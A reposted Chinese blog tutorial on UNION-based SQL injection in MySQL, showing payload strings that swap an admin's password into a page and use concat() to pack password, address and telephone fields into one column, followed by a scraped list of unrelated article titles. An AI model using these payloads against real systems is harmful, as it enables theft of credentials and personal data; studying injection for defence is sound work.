Mysql concat函数与SQL注入
来源:互联网 发布:vscode for mac 编辑:程序博客网 时间:2024/06/06 08:39
uid=-1 union select username ,password,content from test_talbe where user_id=管理员id;
实际执行就是select username,email,content from test_table where user_id=-1 union select username ,password,content from test_talbe where user_id=管理员id;其中显示正常用户emai的地方,变成了显示管理员的密码了。
但是,往往事情并不是这么简单,首先要找到漏洞,其次构造这种语句时候要考虑各个字段的类型,让int或samllint类型的字段显示varchar显然不合适。最后就是本文要说的。
如果出现问题的SQL语句只有一个或两个字段怎么办,我们想知道很多东西,一两个字段太少了,远远不能满足我们的需要。那么我们可以使用concat函数。
concat函数本来是这样用的SELECT CONCAT('My', 'S', 'QL');执行结果是'MySQL'。也就是连接作用的。我们利用它来为我们服务,
uid=-1 union select username ,concat(password,sex,address,telephone),content from test_talbe where user_id=管理员id;
这个语句实际查询了六个字段,但是显示的时候,把password,sex,address,telephone等字段合在一起,显示在原本应该显示email的地方。
- 【mysql】mysql concat函数与SQL注入
- Mysql concat函数与SQL注入
- mysql函数concat与group_concat使用说明
- mysql字符串函数CONCAT_WS与CONCAT()用法
- mysql函数concat与group_concat使用说明
- MySQL中函数CONCAT与GROUP_CONCAT
- SQL中concat()函数、substr()函数与length()函数
- Concat SQL函数
- SQL CONCAT函数
- SQL CONCAT函数
- SQL concat函数
- SQL CONCAT函数
- SQL CONCAT函数
- sql concat() 函数解释
- SQL CONCAT函数
- mysql 连接字符串与SQL不同(mysql CONCAT()的使用)
- mysql的concat函数
- MySQL中concat函数
- designMode和contentEditable的属性的介绍
- EJB3.0 注释小结
- WAP建站WML语言语法基础教程
- 终于加入了 NetBeans Dream Team!
- C#根据当前时间确定日期范围(本周、本月、本季度、本年度)
- Mysql concat函数与SQL注入
- 梦开始的地方。。。
- 希尔算法(记录)
- 获取控件的绝对位置(该控件非position:absolute)
- web开发中缓存问题的研究
- JavaScript得到页面元素的位置
- 常用的正则表达式
- 简单的ASP.net防SQL注入
- 人生写真